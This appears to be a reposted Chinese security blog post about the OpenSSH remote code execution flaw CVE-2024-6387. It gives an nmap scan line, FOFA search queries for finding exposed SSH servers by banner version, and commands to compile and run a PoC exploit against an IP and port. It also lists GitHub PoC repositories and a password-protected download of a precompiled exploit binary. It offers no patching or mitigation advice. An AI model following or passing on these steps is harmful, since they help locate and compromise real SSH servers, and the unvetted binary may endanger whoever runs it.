nmap 127.0.0.1 -Pn 22 -sV
fofa语法
protocol="ssh"
技巧:根据banner信息查找特定shh版本
protocol="ssh" && banner="8.6"
漏洞复现
目前的poc需要大量的时间才能rce,需要不断的去尝试,而且成功率只有一半所以耗时比较久。
gcc -o exploit 7etsuo-regreSSHion.c
./exploit <ip> <port>
例如:
./exploit 127.0.0.1 22
poc
github(需自行编译)
https://github.com/zgzhang/cve-2024-6387-poc
https://github.com/acrono/cve-2024-6387-poc
https://github.com/lflare/cve-2024-6387-poc
编译好的文件(使用ubuntu进行编辑)
下载:https://wwd.lanzouj.com/iwZS323ae9rg 密码:5c26
原文始发于微信公众号(鹏组安全):OpenSSH RCE (CVE-2024-6387) | 附poc
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论